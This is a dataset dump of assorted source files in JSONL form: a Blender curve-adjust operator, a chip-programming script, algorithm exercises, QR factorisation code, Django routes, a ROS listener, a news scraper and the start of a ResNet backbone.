self.slected_curves:\r\n for spline in curve.data.splines:\r\n length_limit = False\r\n if spline.type == 'BEZIER'and len(spline.bezier_points)>1 :\r\n length_limit = True\r\n elif len(spline.points) >2:\r\n length_limit = True\r\n spline.use_cyclic_u = not spline.use_cyclic_u if length_limit else False\r\n self.report({'INFO'}, F'Toggled Cyclic')\r\n\r\n if event.type == 'W' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.show_wire = not curve.show_wire\r\n wire ={True:\"ON\", False:\"OFF\"}\r\n self.report({'INFO'}, F'Wireframe:{wire[self.active_curve.show_wire]}')\r\n\r\n if event.type == 'F' and event.value == 'PRESS':\r\n self.fill_index= self.fill_index+1 if self.fill_index<3 else 0\r\n for curve in self.slected_curves:\r\n curve.data.fill_mode = self.fill_type_3d[self.fill_index] if curve.data.dimensions == '3D' else self.fill_type_2d[self.fill_index]\r\n self.report({'INFO'}, F'Fill Mode:{self.active_curve.data.fill_mode}')\r\n\r\n if event.type == 'V' and event.value == 'PRESS':\r\n self.spline_type_index = self.spline_type_index+1 if self.spline_type_index<2 else 0\r\n self.active_curve.data.splines.active.type = self.spline_type[self.spline_type_index]\r\n if self.active_curve.data.splines.active.type != 'BEZIER' and self.spline_type_index == 2:\r\n self.spline_type_index =0\r\n for curve in self.slected_curves:\r\n for spline in curve.data.splines:\r\n spline.type = self.spline_type[self.spline_type_index]\r\n self.spline_type[self.spline_type_index]\r\n curve.data.splines.update()\r\n if get_preferences().ui.Hops_extra_info:\r\n bpy.ops.hops.display_notification(info=F'Spline Type : {self.active_curve.data.splines.active.type}' )\r\n self.report({'INFO'}, F'Spline type:{self.active_curve.data.splines.active.type}')\r\n\r\n if event.type == 'ONE' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.data.resolution_u = 6\r\n curve.data.render_resolution_u = 12\r\n curve.data.bevel_resolution = 6\r\n curve.data.fill_mode = 'FULL'\r\n self.report({'INFO'}, F'Resolution : 6')\r\n\r\n for name in edgeSplit:\r\n bpy.ops.object.modifier_remove(modifier=name)\r\n\r\n if event.type == 'TWO' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.data.resolution_u = 64\r\n curve.data.render_resolution_u = 64\r\n curve.data.bevel_resolution = 16\r\n curve.data.fill_mode = 'FULL'\r\n self.report({'INFO'}, F'Resolution : 64')\r\n\r\n for name in edgeSplit:\r\n bpy.ops.object.modifier_remove(modifier=name)\r\n\r\n if event.type == 'THREE' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.data.resolution_u = 64\r\n curve.data.render_resolution_u = 64\r\n curve.data.bevel_resolution = 0\r\n curve.data.fill_mode = 'FULL'\r\n if not len(edgeSplit):\r\n bpy.ops.object.modifier_add(type='EDGE_SPLIT')\r\n self.active_curve.modifiers[\"EdgeSplit\"].split_angle = math.radians(60)\r\n self.report({'INFO'}, F'Resolution : 64 / Edge Split Added')\r\n\r\n if self.base_controls.tilde and event.shift == True:\r\n bpy.context.space_data.overlay.show_overlays = not bpy.context.space_data.overlay.show_overlays\r\n\r\n if self.base_controls.confirm:\r\n if not self.start_show_wire:\r\n for curve in self.slected_curves:\r\n curve.show_wire = False\r\n self.remove_shader()\r\n collapse_3D_view_panels(self.original_tool_shelf, self.original_n_panel)\r\n self.master.run_fade()\r\n infobar.remove(self)\r\n return {'FINISHED'}\r\n\r\n if event.type == 'X' and event.value == 'PRESS':\r\n for curve in self.slected_curves:\r\n curve.data.bevel_depth = 0.0\r\n self.report({'INFO'}, F'Depth Set To 0 - exit')\r\n self.remove_shader()\r\n collapse_3D_view_panels(self.original_tool_shelf, self.original_n_panel)\r\n self.master.run_fade()\r\n infobar.remove(self)\r\n return {'FINISHED'}\r\n\r\n if self.base_controls.cancel:\r\n #self.reset_object()\r\n self.restore_objects()\r\n self.remove_shader()\r\n collapse_3D_view_panels(self.original_tool_shelf, self.original_n_panel)\r\n self.master.run_fade()\r\n infobar.remove(self)\r\n return {'CANCELLED'}\r\n\r\n self.draw_master(context=context)\r\n context.area.tag_redraw()\r\n return {\"RUNNING_MODAL\"}\r\n\r\n\r\n # def reset_object(self):\r\n # self.active_curve.show_wire = self.start_show_wire\r\n # self.active_curve.data.fill_mode = self.start_fill_mode\r\n # self.active_curve.data.bevel_depth = self.start_bevel_depth\r\n # for spline in self.active_curve.data.splines:\r\n # spline.type = self.start_spline_type\r\n # spline.order_u =self.start_order_u\r\n\r\n def back_objects(self):\r\n \r\n for curve in self.slected_curves:\r\n back = {}\r\n back[\"show_wire\"]= curve.show_wire\r\n back[\"fill_mode\"]= curve.data.fill_mode\r\n back[\"bevel_depth\"]= curve.data.bevel_depth\r\n back[\"bevel_resolution\"]= curve.data.bevel_resolution\r\n back[\"resolution_u\"] = curve.data.resolution_u \r\n back[\"render_resolution_u\"] = curve.data.render_resolution_u\r\n back[\"spline_type\"] = [spline.type for spline in curve.data.splines]\r\n back[\"spline_order_u\"] = [spline.order_u for spline in curve.data.splines]\r\n back[\"use_cyclic_u\"] = [spline.use_cyclic_u for spline in curve.data.splines]\r\n self.back_dict.update({curve:back})\r\n\r\n def restore_objects(self):\r\n \r\n for curve, back in self.back_dict.items():\r\n curve.show_wire = back[\"show_wire\"]\r\n curve.data.fill_mode = back[\"fill_mode\"]\r\n curve.data.bevel_depth = back[\"bevel_depth\"]\r\n curve.data.bevel_resolution = back[\"bevel_resolution\"]\r\n curve.data.resolution_u = back[\"resolution_u\"]\r\n curve.data.render_resolution_u = back[\"render_resolution_u\"]\r\n for spline , spline_type, spline_order, use_cyclic_u in zip(\r\n curve.data.splines, back[\"spline_type\"], back[\"spline_order_u\"], back[\"use_cyclic_u\"] ):\r\n spline.type = spline_type\r\n spline.order_u = spline_order\r\n spline.use_cyclic_u = use_cyclic_u\r\n\r\n\r\n def draw_master(self, context):\r\n\r\n # Start\r\n self.master.setup()\r\n\r\n\r\n ########################\r\n # Fast UI\r\n ########################\r\n\r\n\r\n if self.master.should_build_fast_ui():\r\n\r\n # Main\r\n win_list = []\r\n if get_preferences().ui.Hops_modal_fast_ui_loc_options != 1: #Fast Floating\r\n win_list.append(\"{:.2f}\".format(self.active_curve.data.bevel_depth))\r\n win_list.append(\"{:.0f}\".format(self.active_curve.data.render_resolution_u))\r\n win_list.append(\"{:.0f}\".format(self.active_curve.data.bevel_resolution))\r\n else:\r\n win_list.append(\"Curve Adjust\")\r\n win_list.append(self.active_curve.data.splines.active.type)\r\n win_list.append(F\"Fill type: {self.active_curve.data.fill_mode}\")\r\n win_list.append(\"Width - {:.3f}\".format(self.active_curve.data.bevel_depth))\r\n win_list.append(\"Segments (ctrl) - {:.0f}\".format(self.active_curve.data.render_resolution_u))\r\n win_list.append(\"Profile:{:.0f}\".format(self.active_curve.data.bevel_resolution))\r\n win_list.append(\"Order:{:.0f}\".format(self.active_curve.data.splines.active.order_u))\r\n\r\n # Help\r\n help_items = {\"GLOBAL\" : [], \"STANDARD\" : []}\r\n\r\n help_items[\"GLOBAL\"] = [\r\n (\"M\", \"Toggle mods list\"),\r\n (\"H\", \"Toggle help\"),\r\n (\"~\", \"Toggle UI Display Type\"),\r\n (\"O\", \"Toggle viewport rendering\")]\r\n\r\n help_items[\"STANDARD\"] = [\r\n (\"X\", \"Set Depth to 0 and end\"),\r\n (\"C\", \"Toggle cyclic\"),\r\n (\"V\", \"Cycle spline type\"),\r\n (\"SHIFT+S\", \"Sync spline shading\"),\r\n (\"S\", \"Toggle smooth shading\"),\r\n (\"W\", \"Toggle Wireframe\"),\r\n (\"F\", \"Cycle Fill Mode\"),\r\n (\"3\", \"Set profile 64 x 4 (Box)\"),\r\n (\"2\", \"Set profile 64 x 16\"),\r\n (\"1\", \"Set profile 12 x 6\"),\r\n (\"Shift + Scroll\", \"Set order\"),\r\n (\"Ctrl + Scroll\", \"Set segments\"),\r\n (\"Scroll\", \"Set resolution\"),\r\n (\"Mouse\", \"Adjust Bevel Depth\")]\r\n\r\n # Mods\r\n mods_list = get_mods_list(mods=bpy.context.active_object.modifiers)\r\n\r\n self.master.receive_fast_ui(win_list=win_list, help_list=help_items, image=\"Curve\", mods_list=mods_list)\r\n\r\n # Finished\r\n self.master.finished()\r\n\r\n ####################################################\r\n # CURSOR WARP\r\n ####################################################\r\n\r\n def safe_draw_shader(self, context):\r\n method_handler(self.draw_shader,\r\n arguments = (context,),\r\n identifier = 'UI Framework',\r\n exit_method = self.remove_shader)\r\n\r\n\r\n def remove_shader(self):\r\n '''Remove shader handle.'''\r\n\r\n if self.draw_handle:\r\n self.draw_handle = bpy.types.SpaceView3D.draw_handler_remove(self.draw_handle, \"WINDOW\")\r\n\r\n\r\n def draw_shader(self, context):\r\n '''Draw shader handle.'''\r\n\r\n draw_modal_frame(context)\r\n\r\n\r\n def splines_set (self, splines=[], attr = \"\", val = None ):\r\n for spline in splines:\r\n setattr(spline, attr, val )\r\n \r\n def splines_add (self, splines=[], attr = \"\", val = None ):\r\n for spline in splines:\r\n current = getattr(spline, attr)\r\n setattr(spline, attr, current+val )","sub_path":"operators/modals/adjust_curve.py","file_name":"adjust_curve.py","file_ext":"py","file_size_in_byte":16453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"35804456","text":"#!/usr/bin/env python\n\nimport sys, socket\nimport logging\nimport argparse\n\nfrom m3_common import m3_common, goc_programmer\n\nm3_common.configure_root_logger()\nlogger = logging.getLogger(__name__)\n\nclass mbus_message(goc_programmer):\n TITLE = \"GOC MBus generator\"\n MSG_TYPE = 'b+'\n\n def parse_args(self):\n self.parser = argparse.ArgumentParser()\n self.parser.add_argument('-g', '--goc-speed',\n help=\"GOC Slow Speed in Hz. The fast speed will be 8x faster.\"\\\n \" Defaults to \" + str(self.SLOW_FREQ_IN_HZ) + \" Hz.\",\n default=self.SLOW_FREQ_IN_HZ)\n self.parser.add_argument(\"SERIAL\", help=\"Path to ICE serial device\", nargs='?')\n self.args = self.parser.parse_args()\n if self.args.SERIAL is None:\n self.serial_path = self.guess_serial()\n else:\n self.serial_path = self.args.SERIAL\n self.SLOW_FREQ_IN_HZ = float(self.args.goc_speed)\n\n def read_binfile(self):\n pass\n\nm = mbus_message()\nm.dont_do_default(\"Run power-on sequence\", m.power_on)\nm.dont_do_default(\"Reset M3\", m.reset_m3)\nlogger.info(\"** Setting ICE MBus controller to slave mode\")\nm.ice.mbus_set_master_onoff(False)\nm.set_slow_frequency()\nm.wake_chip()\nm.set_fast_frequency()\nmessage = m.build_injection_message(hexencoded_data=\"a512345678\")\nm.send_goc_message(message)\n\nlogger.info(\"\")\nlogger.info(\"Message Sent.\")\nlogger.info(\"\")\n\n","sub_path":"platforms/m3/programming/goc_generate_mbus_message.py","file_name":"goc_generate_mbus_message.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"561354651","text":"\"\"\"\nYou are climbing a stair case. It takes n steps to reach to the top.\n\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\n\nNote: Given n will be a positive integer.\n\nExample 1:\n\nInput: 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\nExample 2:\n\nInput: 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 2 steps + 1 step\n\"\"\"\n\n# This is fibonacci series because f(n)=f(n-1)+f(n-2)\nclass Solution(object):\n def climbStairs(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n if n <= 2:\n return n\n\n return self.climbStairs(n-1) + self.climbStairs(n-2)\n\n def climbStairs2(selfs, n):\n if n == 0:\n return 0\n if n <= 2:\n return n\n f = [0 for i in range(n + 1)]\n f[0], f[1], f[2] = 1, 1, 2\n for i in range(3,n+1):\n f[i] = f[i-1] + f[i-2]\n return f[n]\n\n # Same as method 2 but just using int instead of list\n def climbStairs3(self, n):\n if n == 1:\n return 1\n a, b = 1, 2\n for i in range(2, n):\n tmp = b\n b = a + b\n a = tmp\n return b\n\n # using fibonacci formula from wiki\n def climbStairs4(self, n):\n n += 1\n root5 = 5 ** 0.5\n phi = (1 + root5) / 2\n phi2 = (1 - root5) / 2\n return int(1 / root5 * (phi**n - phi2**n))\n\nprint(Solution().climbStairs4(3))","sub_path":"70ClimbStair.py","file_name":"70ClimbStair.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"648420415","text":"import numpy as np\nfrom numpy.linalg import norm\n\n\ndef classical_gram_schmidt_qr(a):\n \"\"\"\n Compute the qr factorization of a matrix.\n\n Factor the matrix a as qr, where q is orthonormal and r is\n upper-triangular using the classical Gram-Schmidt method.\n\n Parameters\n ----------\n a : array_like, shape (M, N)\n Matrix to be factored.\n\n Returns\n -------\n q : ndarray of float or complex, optional\n A matrix with orthonormal columns.\n\n r : ndarray of float or complex, optional\n The upper-triangular matrix.\n \"\"\"\n m, n = a.shape\n r = np.zeros((n, n))\n q = np.zeros((m, n))\n\n for j in range(n):\n v = a[:, j]\n for i in range(j):\n r[i, j] = q[:, i].T@a[:, j]\n v = v - r[i, j]*q[:, i]\n r[j, j] = norm(v)\n q[:, j] = v/r[j, j]\n return q, r\n\n\ndef modified_gram_schmidt_qr(a):\n \"\"\"\n Compute the qr factorization of a matrix.\n\n Factor the matrix a as qr, where q is orthonormal and r is\n upper-triangular using the modified Gram-Schmidt method.\n\n Parameters\n ----------\n a : array_like, shape (M, N)\n Matrix to be factored.\n\n Returns\n -------\n q : ndarray of float or complex, optional\n A matrix with orthonormal columns.\n\n r : ndarray of float or complex, optional\n The upper-triangular matrix.\n \"\"\"\n m, n = a.shape\n q = np.zeros((m, n))\n r = np.zeros((n, n))\n v = a.astype(float)\n\n for i in range(n):\n r[i, i] = norm(v[:, i])\n q[:, i] = v[:, i]/r[i, i]\n for j in range(i+1, n):\n r[i, j] = q[:, i].T@v[:, j]\n v[:, j] = v[:, j] - r[i, j]*q[:, i]\n\n return q, r\n\n\ndef householder_qr(a):\n \"\"\"\n Compute the qr factorization of a matrix.\n\n Factor the matrix a as qr, where q is orthonormal and r is\n upper-triangular using the Householder transform based method.\n\n Parameters\n ----------\n a : array_like, shape (M, N)\n Matrix to be factored.\n\n Returns\n -------\n q : ndarray of float or complex, optional\n A matrix with orthonormal columns.\n\n r : ndarray of float or complex, optional\n The upper-triangular matrix.\n \"\"\"\n m, n = a.shape\n q_t = np.identity(m)\n r = a.astype(float)\n\n for k in range(n):\n v = np.sign(r[k, k])*norm(r[k:, k])*np.identity(m - k)[0] + r[k:, k]\n v = v/norm(v)\n for i in range(k, n):\n r[k:, i] = r[k:, i] - 2*v*(v.T@r[k:, i])\n\n # construct Q* using Algorithm 10.3\n for i in range(m):\n q_t[k:, i] = q_t[k:, i] - 2*v*(v.T@q_t[k:, i])\n\n return q_t.T, r\n\n\ndef eval_qr(a):\n \"\"\"\n Calculates the QR decomposition A=QR using the 3 different implementations\n as well as the Numpy method and evaluates the results in the way the\n assignment asks for.\n\n Parameters\n ----------\n a : array_like, shape (M, N)\n Matrix to be factored.\n \"\"\"\n cs_q, cs_r = classical_gram_schmidt_qr(a)\n ms_q, ms_r = modified_gram_schmidt_qr(a)\n h_q, h_r = householder_qr(a)\n np_q, np_r = np.linalg.qr(a)\n\n # check correctness:\n print(\"Check for correctness:\")\n print(\"Classical Gram-Schmidt: ||QR - A|| =\",\n norm(cs_q@cs_r - a))\n print(\"Modified Gram-Scmidt: ||QR - A|| =\",\n norm(ms_q@ms_r - a))\n print(\"Householder Transform based: ||QR - A|| =\",\n norm(h_q@h_r - a))\n print(\"Numpy: ||QR - A|| =\",\n norm(np_q@np_r - a))\n\n # check orthogonality\n print('\\nCheck orthogonality')\n print(\"Classical Gram-Schmidt: ||Q*Q - I|| =\",\n norm(cs_q.T@cs_q - np.identity(cs_q.shape[1])))\n print(\"Modified Gram-Scmidt: ||Q*Q - I|| =\",\n norm(ms_q.T@ms_q - np.identity(ms_q.shape[1])))\n print(\"Householder Transform based: ||Q*Q - I|| =\",\n norm(h_q.T@h_q - np.identity(h_q.shape[1])))\n print(\"Numpy: ||Q*Q - I|| =\",\n norm(np_q.T@np_q - np.identity(np_q.shape[1])))\n\n\nif __name__ == \"__main__\":\n # create the example matrices\n Z = np.array([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 7],\n [4, 2, 3],\n [4, 2, 2]])\n A = np.array([[0.7, 0.70711],\n [0.70001, 0.70711]])\n\n # run the evaluation for both cases\n print('Case 1:\\n-------')\n eval_qr(Z)\n print('\\nCase 2:\\n-------')\n eval_qr(A)\n","sub_path":"04/code/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"602504912","text":"from Felzenswalb_Huttenlocher_segmentation_v2 import FHSegmentation\nimport imageio\n\ntest_image = imageio.imread('testing/Untitled.png')\n\ndef ConstructMinimalInternalDifference(k):\n def MinimalInternalDifference(cluster1, cluster2, attribute1, attribute2):\n return min(attribute1 + (k / len(cluster1)), attribute2 + (k / len(cluster2)))\n\n return MinimalInternalDifference;\n \n\ndef MaxEdgeWeightInMinimalSpanningTree(nodes, graph):\n min_tree_node_set = [nodes[0]]\n min_tree_edge_set = []\n edge_set = graph.GetEdges(nodes[0]).items()\n while (len(min_tree_node_set) < len(nodes)):\n edge_set = sorted(edge_set, key=lambda k, v: v.GetWeight())\n while len(edge_set) > 0:\n if edge_set[0][0][1] not in min_tree_node_set:\n min_tree_node_set.append(edge_set[0][0][1])\n min_tree_edge_set.append(edge_set[0][1])\n edge_set.extend(graph.GetEdges(edge_set[0][0][1]).items)\n edge_set.pop(0)\n break\n else:\n edge_set.pop(0)\n \n return 0 if len(nodes) == 1 else max(map(lambda x: x.GetWeight(), min_tree_edge_set))\n\ndef EdgeWeight(node1, node2):\n return sum(map(lambda x: int(x[0]) * int(x[1]), zip(node1, node2)))\n\nprint(\"Initializing...\")\nFH = FHSegmentation(\n test_image,\n ConstructMinimalInternalDifference(10),\n MaxEdgeWeightInMinimalSpanningTree,\n EdgeWeight,\n True);\nprint(\"Starting to generate graph...\")\nFH.generate_graph_from_input_()\nprint(\"Generating partition...\")\nFH.generate_partition_()\nprint(\"Done!\")\n","sub_path":"clustering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"461604762","text":"import csv # module csv built-in\n\ncityNameIndex = 8\nn = 0\n\nwith open(\"files/cities.csv\", \"r\") as csvFile:\n rows = csv.reader(csvFile, delimiter=\",\")\n rows2 = [1,5,6]\n for r in rows:\n cityName = r[8].strip().strip(\"\\\"\")\n if cityName.startswith(\"San\"):\n n += 1\n\nprint(\"Nombre de villes trouvées: %d\" % n)","sub_path":"python/csvDemo2.py","file_name":"csvDemo2.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"53611202","text":"import tornado\nfrom lxml import etree\nfrom app.handlers.request_handler import AbstractRequestHandler\nfrom app.messages.xml_parser import xml_to_dict\nfrom app.messages.xml_render import render\nimport os\nfrom os import listdir, path\nimport re\n\nfrom app.utils.collections import navigate\n\n\nclass TfHandler(AbstractRequestHandler):\n\n @staticmethod\n def filter_by_location(origin, destination):\n compare_location = lambda location: location[\"Origin\"][\"Code\"] == \\\n origin and location[\"Destination\"][\"Code\"]== destination\n\n # Returns a function expecting request as a param\n return lambda request : navigate(request,\n \"CommandList.StartRouting.RouterList.Router.RequestedLocations\",\n compare_location)\n @staticmethod\n def filter_by(path, val):\n return lambda request: navigate(request, path, lambda x: x == val)\n\n @staticmethod\n def filter_by_routing_id(routing_id):\n return TfHandler.filter_by(\"CommandList.*.RoutingId\", routing_id)\n\n def parse_mock_files(base):\n dir = os.path.dirname(__file__)\n p = path.join(dir, \"../..\", base)\n\n files = {}\n\n for file in listdir(p):\n print(file)\n try:\n full_path = path.join(p, file)\n files[full_path] = xml_to_dict(open(full_path).read())\n except Exception as e:\n print(\"Error parsing file {}\".format(file))\n raise e\n\n return files\n\n files = parse_mock_files(\"messages/tf\")\n\n def both(f1, f2):\n return lambda x : f1(x) and f2(x)\n\n async def on_request(self, parsed_request):\n\n command_list = parsed_request[\"CommandList\"]\n\n method = list(command_list.keys())[0]\n\n if method == \"StartRouting\":\n (origin, destination) = self.parse_itinerary(parsed_request)\n template = self.find_template(name=\"StartRouting\",\n query=TfHandler.filter_by_location(origin,\n destination))\n response = render(template, request=parsed_request)\n\n elif method == \"CheckRouting\":\n\n routing_id = navigate(\n parsed_request, \"CommandList.CheckRouting.RoutingId\")[0]\n\n template = self.find_template(name=\"CheckRouting\",\n query=TfHandler.filter_by_routing_id(\n routing_id))\n\n response = render(template,\n request=parsed_request)\n elif method == \"ProcessDetails\":\n\n outward_id = navigate(\n parsed_request, \"CommandList.*.RoutingId\")[0]\n\n routing_id = navigate(\n parsed_request, \"CommandList.*.RoutingId\")[0]\n\n template = self.find_template(name=\"ProcessDetails\",\n query=TfHandler.both(\n TfHandler.filter_by(\n \"CommandList.*.RoutingId\",\n routing_id),\n TfHandler.filter_by(\n \"CommandList.*.RoutingId\",\n outward_id)\n ))\n\n response = render(template,\n request=parsed_request)\n\n elif method == \"ProcessTerms\":\n response = render(\"tf/BCN-MAD-ProcessTermsResponse.xml\",\n request=parsed_request)\n elif method == \"CheckBooking\":\n response = render(\"tf/BCN-MAD-CheckBookingResponse.xml\",\n request=parsed_request)\n else:\n msg = \"Cannot find method {}\".format(method)\n raise tornado.web.HTTPError(reason=msg, log_message=msg,\n status_code=404)\n\n print(\"Returning {}\".format(method))\n self.set_header(\"Content-Type\", \"text/xml\")\n self.write(response)\n\n def parse_itinerary(self, parsed_request):\n origin = parsed_request['CommandList']['StartRouting']['Origin']\n destination = parsed_request['CommandList']['StartRouting'][\n 'Destination']\n\n return (origin['Descriptor'], destination['Descriptor'])\n\n def find_template(self, **kwargs):\n\n start = TfHandler.files.items()\n candidates = start\n\n if kwargs.get('name'):\n expr = \"{}\".format(kwargs.get('name'))\n candidates = [file for file in start if re.search(expr, file[0])]\n\n if kwargs.get('query'):\n query = kwargs.get('query')\n candidates = [candidate for candidate in candidates if\n query(candidate[1])]\n\n assert len(candidates) == 1, \"Candidates expected to be 1, found {}\".format(candidates)\n\n return candidates[0][0]\n\n\n\n\n","sub_path":"app/handlers/tf/tf_handler.py","file_name":"tf_handler.py","file_ext":"py","file_size_in_byte":5072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"235521487","text":"class Parking:\n def __init__(self):\n self.__cars = set()\n\n def process_car(self, direction, car):\n if direction == 'IN':\n self.__cars.add(car)\n elif direction == 'OUT' and car in self.__cars:\n self.__cars.remove(car)\n\n def print_status(self):\n if self.__cars:\n print('\\n'.join([reg_num for reg_num in self.__cars]))\n else:\n print(\"Parking Lot is Empty\")\n\nparking = Parking()\n\nn = int(input())\n\nfor _ in range(n):\n direction, reg_num = input().split(', ')\n parking.process_car(direction, reg_num)\nparking.print_status()","sub_path":"02.Tuples_and_Sets/4.1.Parking_lot-with_classes.py","file_name":"4.1.Parking_lot-with_classes.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157236447","text":"# Steps\r\n# Create your own Menu Choices\r\n# Take the Customer Order along with Quantity of each item\r\n# Customer should \r\n# have the choice of ordering more than 1 dish.\r\n# Print the Final Bill for the customer\r\nrows=int(input(\"Enter number of rows: \"))\r\nfor i in range(rows):\r\n for j in range(i+1):\r\n print('*',end =\"\")\r\n print(\"\\n\")","sub_path":"dictannaryhomework.py","file_name":"dictannaryhomework.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"606032583","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom .views import BlogView,IndividualView,NewView,editview,deleteview\n\nurlpatterns = [\n path('',BlogView.as_view(),name=\"home\"),\n path('individual//',IndividualView.as_view(),name=\"individual\"),\n path ('add/',NewView.as_view(),name=\"add\"),\n path('edit/',editview.as_view(),name='edit'),\n path('delete/',deleteview.as_view(),name='delete'),\n path('accounts/',include('django.contrib.auth.urls'),name=\"login\"),\n \n]\n","sub_path":"blog_app chap 5-10/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"105607570","text":"#trees/binarytree.py\nclass BinaryTree(object):\n '''\n Binary tree implementation.\n '''\n class _Node:\n '''\n None public class storing node data.\n '''\n __slot__ = '_element', '_parent', '_left', '_right'\n\n def __init__(self, element, parent = None, left = None, right = None):\n self._element = element\n self._parent = parent\n self._left = left\n self._right = right\n\n def __init__(self):\n self._root = None\n self._size = 0\n\n def add_left(self, e, node = None):\n newest = self._Node(e)\n if node is None:\n self._root._left = newest\n newest._parent = self._root\n\n else:\n node._left = newest\n node._left._parent = node\n self._size += 1\n\n def add_right(self, e, node = None):\n newest = self._Node(e)\n if node is None:\n self._root._right = newest\n newest._parent = self._root\n else:\n node._right = newest\n node._right._parent = node\n self._size += 1\n\n def add_root(self, e):\n if self._root is not None:\n raise ValueError(\"Root already exist!\")\n self._root = self._Node(e)\n self._size = 1\n\n def add_node(self, e, node = None):\n if node is None:\n node = self._root\n\n if self._root == None:\n self.add_root(e)\n else:\n if e <= node._element:\n if node._left is None:\n self.add_left(e)\n else:\n self.add_left(e, node._left)\n else:\n if node._right is None:\n self.add_right(e)\n else:\n self.add_right(e, node)\n","sub_path":"Data Structures/Trees/binarytree.py","file_name":"binarytree.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440842368","text":"#!/usr/bin/env python2\nimport math\n\nimport rospy\nfrom sensor_msgs.msg import JointState\nfrom std_msgs.msg import Header\nfrom mycobot_communication.msg import MycobotAngles\n\n\nclass Listener(object):\n def __init__(self):\n super(Listener, self).__init__()\n\n rospy.loginfo(\"start ...\")\n rospy.init_node(\"real_listener_1\", anonymous=True)\n # init publisher.\n self.pub = rospy.Publisher(\"joint_states\", JointState, queue_size=10)\n # init subscriber.\n self.sub = rospy.Subscriber(\"mycobot/angles_real\", MycobotAngles, self.callback)\n rospy.spin()\n\n def callback(self, data):\n \"\"\"`mycobot/angles_real` subscriber callback method.\n\n Args:\n data (MycobotAngles): callback argument.\n \"\"\"\n # ini publisher object.\n joint_state_send = JointState()\n joint_state_send.header = Header()\n\n joint_state_send.name = [\n \"arm1_joint\",\n \"arm2_joint\",\n \"arm3_joint\",\n \"arm4_joint\",\n \"arm5_joint\",\n \"arm6_joint\",\n ]\n joint_state_send.velocity = [0]\n joint_state_send.effort = []\n joint_state_send.header.stamp = rospy.Time.now()\n\n # process callback data.\n radians_list = [\n data.joint_1 * (math.pi / 180),\n data.joint_2 * (math.pi / 180),\n data.joint_3 * (math.pi / 180),\n data.joint_4 * (math.pi / 180),\n data.joint_5 * (math.pi / 180),\n data.joint_6 * (math.pi / 180),\n ]\n rospy.loginfo(\"res: {}\".format(radians_list))\n\n joint_state_send.position = radians_list\n self.pub.publish(joint_state_send)\n\n\nif __name__ == \"__main__\":\n try:\n Listener()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"examples/mycobot_ros/mycobot_280/scripts/listen_real_of_topic.py","file_name":"listen_real_of_topic.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"104289067","text":"import urllib.request\nimport time\nfrom bs4 import BeautifulSoup as bs\n\nurl = \"https://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=105\"\n\nresponse = urllib.request.urlopen(url)\n\nsoup = bs(response, 'html.parser')\n\nresults = soup.select(\".cluster_body a\") # Find subject\n\nfor result in results:\n print('Subject : ',result.string)\n \n url_article = result.attrs[\"href\"] # Find URL \n \n response = urllib.request.urlopen(url_article)\n \n soup_article = bs(response, 'html.parser')\n\n content = soup_article.select_one('#articleBodyContents') # Find main content\n\n print('Content')\n\n output =\"\"\n\n for item in content.contents: # Contents attr for string in tag\n stripped = str(item).strip()\n\n if stripped == \"\" : \n continue\n if stripped[0] not in [\"<\", \"/\"]:\n output += stripped\n \n print(output.replace(\n '본문 내용TV플레이어',\n '')\n )\n\n\n time.sleep(1) # To sleep not to be banned from naver throw multiple requests in a short-time","sub_path":"scraping/naver_news.py","file_name":"naver_news.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"155916388","text":"from typing import Tuple\n\nimport torchvision\nfrom torch import nn\n\nimport backbone.base\n\n\nclass ResNet101(backbone.base.Base):\n\n def __init__(self, pretrained: bool):\n super().__init__(pretrained)\n\n def features(self) -> Tuple[nn.Module, nn.Module, int, int]:\n resnet101 = torchvision.models.resnet101(pretrained=self._pretrained)\n\n # list(resnet101.children()) consists of following modules\n # [0] = Conv2d, [1] = BatchNorm2d, [2] = ReLU,\n # [3] = MaxPool2d, [4] = Sequential(Bottleneck...),\n # [5] = Sequential(Bottleneck...),\n # [6] = Sequential(Bottleneck...),\n # [7] = Sequential(Bottleneck...),\n # [8] = AvgPool2d, [9] = 